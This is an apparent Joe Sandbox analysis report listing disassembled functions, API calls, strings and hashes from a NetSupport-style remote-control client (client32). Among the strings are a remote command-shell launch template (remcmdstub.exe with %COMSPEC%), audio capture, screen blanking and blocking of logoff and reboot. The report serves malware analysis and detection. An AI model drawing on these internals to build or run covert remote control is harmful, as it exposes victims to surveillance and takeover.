Northpoint Lockdown Preferences, xrefs: 110517EB
DoNSMProtect - Turn OFF, xrefs: 110517D7
DoNSMProtect - CANNOT ACCESS PREFERENCES!!!, xrefs: 110519B8
Admin, xrefs: 1105181B
idata != NULL, xrefs: 110516D1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset$ErrorExitLastMessageProcess_free_memmove_sprintfwsprintf
String ID: Admin$CLTCONN.CPP$DoNSMProtect - CANNOT ACCESS PREFERENCES!!!$DoNSMProtect - PASSWORDS DO NOT MATCH!!!$DoNSMProtect - Turn OFF$DoNSMProtect - Turn ON$Northpoint$Northpoint Lockdown Preferences$RUNPLUGIN2$idata != NULL$pnc != NULL
API String ID: 3389330382-4102942643
Opcode ID: 3a4f0ca528755310849f4cf1df296b6e02977eb772e112d54cba272365e29cbc
Instruction ID: 1bd33a8b20392b5b460f5ae28a67728c10b9c193f4645e5b1299eeee90bba5c4
Opcode Fuzzy Hash: 3a4f0ca528755310849f4cf1df296b6e02977eb772e112d54cba272365e29cbc
Instruction Fuzzy Hash: C1A1A575E012599FDB60DF64DC80BEEF7B4AF59308F0081D9E55967280EB706A48CF91

Function 11059490 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110594C3
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,74DF2EF0,74DF2EE0,74E02D70), ref: 11059504
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059516
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059520
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 1105952C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059536
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059542
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1105954C
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059558
ResetEvent.KERNEL32(00000000), ref: 11059560
wsprintfA.USER32 ref: 1105958D
CloseHandle.KERNEL32(?), ref: 11059639

Part of subcall function 1108BC20: _memset.LIBCMT ref: 1108BC89
Part of subcall function 1108BC20: GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCA2
Part of subcall function 1108BC20: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCD4
Part of subcall function 1108BC20: CloseHandle.KERNEL32(00000000), ref: 1108BD0C

Strings

D, xrefs: 110594DD
remcmdstub.exe %u %u %u %u %%COMSPEC%%, xrefs: 11059587
CloseHandle_1, xrefs: 11059646

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$EventInformation$Create$Close_memset$ResetTokenVersionwsprintf
String ID: CloseHandle_1$D$remcmdstub.exe %u %u %u %u %%COMSPEC%%
API String ID: 3301782102-1870880251
Opcode ID: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
Instruction ID: 9498dede17ae523b820893f7966d078463fb7189cb60d919b27b44eccd4d473b
Opcode Fuzzy Hash: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
Instruction Fuzzy Hash: C8516675A41328ABEB51CF98CC85FEAB7B9EB48B04F004099F718E72C4E6B16940CF55

Function 11121100 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 270threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
GetCurrentThreadId.KERNEL32 ref: 111211B5
GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3

Strings

LegacyScrape, xrefs: 1112147E
ScaleToFitTilingFactor, xrefs: 11121420
IgnoreScrape, xrefs: 1112146A
MaxLag, xrefs: 1112143E
Show, xrefs: 11121376
ScaleToFitMode, xrefs: 11121406
LimitColorbits, xrefs: 11121201
ShowBigBlits, xrefs: 111213F2
NSMRemote32, xrefs: 111213A5
View, xrefs: 1112120F, 1112130F, 111213F7, 1112140B, 11121425, 11121443, 1112146F, 11121483

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
API String ID: 3042533059-2538903574
Opcode ID: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
Opcode Fuzzy Hash: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51

Function 11041550 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202processCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110416EC
wsprintfA.USER32 ref: 1104171E
wsprintfA.USER32 ref: 11041769
_memset.LIBCMT ref: 11041776
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 110417AE
CloseHandle.KERNEL32(?), ref: 110417C5
CloseHandle.KERNEL32(?), ref: 110417CE

Part of subcall function 11094E70: LoadLibraryA.KERNEL32(USER32,?,?,110077D5), ref: 11094E79
Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 11094E8D
Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 11094E9A
Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11094EA7
Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11094EB4
Part of subcall function 11094E70: _memset.LIBCMT ref: 11094EC4

Part of subcall function 11094DC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 11094DDD

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 11015410: GlobalAddAtomA.KERNEL32(NSMIdentifyWnd), ref: 11015426

Strings

%sPlaySound.exe, xrefs: 11041718
D, xrefs: 110417A4
%s %s, xrefs: 11041763
StudentPicked.wav, xrefs: 110416CA
%sSounds\%s, xrefs: 110416BC, 110416DA
RandomSelect, xrefs: 11041603
StudentSelected.wav, xrefs: 110416AC

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProcwsprintf$_memset$CloseHandle$AtomCreateGlobalInfoLibraryLoadParametersProcessSystem
String ID: %s %s$%sPlaySound.exe$%sSounds\%s$D$RandomSelect$StudentPicked.wav$StudentSelected.wav
API String ID: 2679228845-3892444432
Opcode ID: b3725c502d2789fe40fbb26aadf6588f8ed80d9f12081c1d57b9f8c917426c69
Instruction ID: 9c2d6cc32ef246ace46494575b6d7f0e632273de9197a299b6468622a4a2010b
Opcode Fuzzy Hash: b3725c502d2789fe40fbb26aadf6588f8ed80d9f12081c1d57b9f8c917426c69
Instruction Fuzzy Hash: 0A7187B5E4021E6BEB15DB50DC81FDEB7B8AB04718F1041D9E619A71C0EA70BB44CFA5

Function 1100B330 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,CF3D35D0), ref: 1100B3BB
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
_calloc.LIBCMT ref: 1100B409
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
LeaveCriticalSection.KERNEL32(?), ref: 1100B469

Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,CF3D35D0), ref: 1100ACA4
Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
Part of subcall function 1100AC60: _free.LIBCMT ref: 1100AD73
Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95

LeaveCriticalSection.KERNEL32(?), ref: 1100B48E

Strings

\\.\NSAudioFilter, xrefs: 1100B3D0
Vista new pAudioCap=%p, xrefs: 1100B4F3
InitCaptureSounds NT6, xrefs: 1100B4AE
Audio, xrefs: 1100B367
Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
DisableSounds, xrefs: 1100B362
Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C
Vista AddAudioCapEvtListener(%p), xrefs: 1100B513

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc__wcstoi64_calloc_free
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 2005284756-2362500394
Opcode ID: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
Opcode Fuzzy Hash: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1

Function 110F5510 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 158windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

ShowCursor.USER32(00000000), ref: 110F55DD
OpenEventA.KERNEL32(00100000,00000000,NSBlankExit), ref: 110F55EE
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5614
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5633
TranslateMessage.USER32(?), ref: 110F5644
DispatchMessageA.USER32(?), ref: 110F564D
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5661
CloseHandle.KERNEL32(?), ref: 110F5674
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F568C
TranslateMessage.USER32(?), ref: 110F56A7
DispatchMessageA.USER32(?), ref: 110F56B0
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F56BF
ShowCursor.USER32(00000001), ref: 110F56CD

Strings

NSBlankExit, xrefs: 110F55E3

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CursorDispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
String ID: NSBlankExit
API String ID: 3602634875-773372720
Opcode ID: e68260c3a4de123fa72860ee07f86da7e712f847a20bfc2a252c0d5c7a084281
Instruction ID: 5ec7c1be67ca2a78862dc13c18a8ec745b66933f059b542a1e0c74ee0f1129a0
Opcode Fuzzy Hash: e68260c3a4de123fa72860ee07f86da7e712f847a20bfc2a252c0d5c7a084281
Instruction Fuzzy Hash: 68513E76E4132EABDB10DF608C85FEDB7B8AB48704F1005A9E615D7184EB75AA40CF91

Function 11103110 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1110313E
EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
GetTickCount.KERNEL32 ref: 1110314D
GetTickCount.KERNEL32 ref: 111031A0
LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
GetTickCount.KERNEL32 ref: 111031DA
LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B

Strings

Warning. took %d ms to get simap lock, xrefs: 11103159
psi, xrefs: 11103193, 11103248, 1110328E
info. new psi(%d) = %x, xrefs: 111032C1
Warning. simap lock held for %d ms, xrefs: 111031B9, 111031F3
e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 1110318E, 11103243, 11103289

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
API String ID: 3572004736-3013461081
Opcode ID: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
Opcode Fuzzy Hash: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1

Function 1103B020 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 140sleepwindowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1103B15F
Sleep.KERNEL32(000001F4), ref: 1103B1A4
PostMessageA.USER32(000104E4,00000010,00000000,00000000), ref: 1103B1CF

Strings

DisablePowerOff, xrefs: 1103B077
DisableShutDown, xrefs: 1103B173
DisableLogoff, xrefs: 1103B05A, 1103B0D0, 1103B18A
CLTCONN.CPP, xrefs: 1103B11D
sd - Post WM_CLOSE to %08x, xrefs: 1103B1B6
FALSE || !"assertOnReboot", xrefs: 1103B122
_debug, xrefs: 1103B107, 1103B138
GPFOnReboot, xrefs: 1103B133
Client, xrefs: 1103B05F, 1103B07C, 1103B099, 1103B0D5, 1103B18F
DisableReboot, xrefs: 1103B094
AssertOnReboot, xrefs: 1103B102

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountMessagePostSleepTick
String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
API String ID: 507213284-4185502373
Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355

Function 11047600 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 137processwindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11047686
WinExec.KERNEL32(?,00000001), ref: 110476FF
CloseHandle.KERNEL32(?), ref: 11047721
CloseHandle.KERNEL32(?), ref: 1104772A
IsWindow.USER32(00000000), ref: 1104773C
GetLastError.KERNEL32 ref: 11047767
IsWindow.USER32(00000000), ref: 11047799
PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 110477AA

